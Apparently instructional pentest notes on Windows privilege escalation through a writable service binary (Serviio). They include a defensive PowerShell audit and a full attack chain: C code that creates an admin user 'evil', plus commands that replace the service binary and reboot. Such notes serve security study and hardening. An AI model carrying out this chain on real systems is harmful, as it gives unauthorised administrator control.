Binary hijacking / Insecure file permissions
Another way to elevate privileges on a Windows system is to exploit insecure file permissions on the binary of a service that runs as NT AUTHORITY\SYSTEM. Example: the Serviio service.
List the running services (Get-WmiObject is a PowerShell cmdlet) and look for any that stand out:

    Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}

Here C:\Program Files\Serviio\bin\ServiioService.exe looks suspicious.

Check the permissions on the suspicious service binary with the icacls Windows utility (F = full access, M = modify access, RX = read and execute access, W = write-only access):

    icacls "C:\Program Files\Serviio\bin\ServiioService.exe"

The output contains BUILTIN\Users:(I)(F), meaning any user has full access to the binary ((I) marks an inherited ACE, so the weak grant comes from the parent directory).
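The manual Get-WmiObject/icacls check above generalised into an audit, as an added example that is not part of these notes: it walks every installed service, resolves the binary from PathName, and reports ACEs that give broad groups write rights, together with the icacls command that removes the grant. The list of principals treated as "broad" is an assumption; extend it for your environment. Run from an elevated PowerShell prompt.

```powershell
# Added audit example (not from the original notes). Principal list is an assumption.
$BroadPrincipals = @('BUILTIN\Users', 'Everyone',
                     'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
# Only write-style bits: Modify and FullControl contain these, ReadAndExecute does not.
$WeakRights = [System.Security.AccessControl.FileSystemRights]::WriteData -bor
              [System.Security.AccessControl.FileSystemRights]::AppendData -bor
              [System.Security.AccessControl.FileSystemRights]::Delete -bor
              [System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
              [System.Security.AccessControl.FileSystemRights]::TakeOwnership

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # PathName is either "C:\dir with spaces\svc.exe" -args or C:\dir\svc.exe -args.
    # An unquoted path containing spaces is a separate weakness and is skipped here.
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    return ($PathName -split '\s+')[0]
}

function Find-WritableServiceBinary {
    Get-CimInstance Win32_Service | ForEach-Object {
        $svc = $_
        if (-not $svc.PathName) { return }
        $bin = Get-ServiceBinaryPath $svc.PathName
        if (-not (Test-Path -LiteralPath $bin)) { return }
        $acl = Get-Acl -LiteralPath $bin
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            if (($ace.FileSystemRights -band $WeakRights) -eq 0) { continue }
            [pscustomobject]@{
                Service   = $svc.Name
                StartMode = $svc.StartMode
                RunsAs    = $svc.StartName
                Binary    = $bin
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited
                # Remediation. An inherited ACE (shown as (I) by icacls, as in the
                # Serviio output above) must be fixed on the parent directory or
                # after breaking inheritance with: icacls "<bin>" /inheritance:d
                Fix       = "icacls `"$bin`" /remove:g `"$($ace.IdentityReference.Value)`""
            }
        }
    }
}

Find-WritableServiceBinary | Format-Table -AutoSize
```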
C code that creates an "evil" user and adds it to the local Administrators group (adduser.c):

    #include <stdlib.h>

    /* adduser.c: runs as the service account (SYSTEM) once it replaces the
       service binary, creates a local user and adds it to the Administrators
       and Remote Desktop Users groups. */
    int main(void)
    {
        int i;
        /* password matches the login step at the end of these notes */
        i = system("net user evil Ev!lpass /add");
        i = system("net localgroup administrators evil /add");
        /* the group name contains spaces, so it must be double-quoted;
           single quotes are not a grouping character for cmd.exe */
        i = system("net localgroup \"Remote Desktop Users\" evil /add");
        (void)i;
        return 0;
    }
Compile adduser.c on Linux with the MinGW cross-compiler:

    i686-w64-mingw32-gcc adduser.c -o adduser.exe

Replace the original ServiioService.exe binary with the malicious copy:

    move "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe"
    move adduser.exe "C:\Program Files\Serviio\bin\ServiioService.exe"
    dir "C:\Program Files\Serviio\bin\"
Restart the service:

    net stop Serviio

Most of the time the current user does not have permission to restart the service, but the service may be set to start automatically ("Auto") after a system reboot. To check:

    wmic service where caption="Serviio" get name, caption, state, startmode

Check whether the current user has the privilege to reboot:

    whoami /priv

Reboot:

    shutdown /r /t 0

After the reboot, log in as "evil" with the password "Ev!lpass" and confirm that the evil user is in the local Administrators group:

    net localgroup Administrators